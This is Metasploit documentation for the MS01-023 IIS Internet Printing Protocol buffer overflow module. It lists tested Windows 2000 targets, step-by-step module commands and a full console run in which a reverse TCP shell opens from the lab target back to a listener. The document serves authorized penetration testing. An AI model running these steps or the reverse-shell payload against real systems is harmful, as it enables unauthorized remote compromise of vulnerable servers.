CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/iis/ms01_023_printer.md
Views: 1904

Vulnerable Application

This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 Server and Professional SP0-SP1.

If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.

This module has been tested successfully on:

  • Windows 2000 Professional SP0 (Dutch)

  • Windows 2000 Professional SP0 (Finnish)

  • Windows 2000 Professional SP0 (Greek)

  • Windows 2000 Professional SP0 (Korean)

  • Windows 2000 Professional SP0 (Turkish)

  • Windows 2000 Professional SP1 (Arabic)

  • Windows 2000 Professional SP1 (Czech)

  • Windows 2000 Professional SP1 (English)

  • Windows 2000 Professional SP1 (Greek)

  • Windows 2000 Server SP0 (Chinese)

  • Windows 2000 Server SP0 (Dutch)

  • Windows 2000 Server SP0 (English)

  • Windows 2000 Server SP0 (German)

  • Windows 2000 Server SP0 (Hungarian)

  • Windows 2000 Server SP0 (Italian)

  • Windows 2000 Server SP0 (Portuguese)

  • Windows 2000 Server SP0 (Spanish)

  • Windows 2000 Server SP0 (Turkish)

  • Windows 2000 Server SP1 (English)

  • Windows 2000 Server SP1 (French)

  • Windows 2000 Server SP1 (Swedish)

Verification Steps

  1. use exploit/windows/iis/ms01_023_printer

  2. set RHOSTS [IP]

  3. show targets to see the possible targets

  4. set TARGET [TARGET]

  5. set PAYLOAD windows/shell/reverse_tcp

  6. set LHOST [IP]

  7. run

Options

Scenarios

Windows 2000 Professional SP1 (EN)

msf6 > use exploit/windows/iis/ms01_023_printer
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_023_printer) > set rhosts 192.168.200.195
rhosts => 192.168.200.195
msf6 exploit(windows/iis/ms01_023_printer) > check
[*] 192.168.200.195:80 - The target appears to be vulnerable.
msf6 exploit(windows/iis/ms01_023_printer) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP1 (Arabic)
   1   Windows 2000 SP0-SP1 (Czech)
   2   Windows 2000 SP0-SP1 (Chinese)
   3   Windows 2000 SP0-SP1 (Dutch)
   4   Windows 2000 SP0-SP1 (English)
   5   Windows 2000 SP0-SP1 (French)
   6   Windows 2000 SP0-SP1 (Finnish)
   7   Windows 2000 SP0-SP1 (German)
   8   Windows 2000 SP0-SP1 (Korean)
   9   Windows 2000 SP0-SP1 (Hungarian)
   10  Windows 2000 SP0-SP1 (Italian)
   11  Windows 2000 SP0-SP1 (Portuguese)
   12  Windows 2000 SP0-SP1 (Spanish)
   13  Windows 2000 SP0-SP1 (Swedish)
   14  Windows 2000 SP0-SP1 (Turkish)
   15  Windows 2000 Pro SP0 (Greek)
   16  Windows 2000 Pro SP1 (Greek)


msf6 exploit(windows/iis/ms01_023_printer) > set target 4
target => 4
msf6 exploit(windows/iis/ms01_023_printer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_023_printer) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms01_023_printer) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using target: Windows 2000 SP0-SP1 (English) ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.195
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1168) at 2022-07-08 11:07:42 -0400


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----


C:\WINNT\system32>ver
ver

Microsoft Windows 2000 [Version 5.00.2195]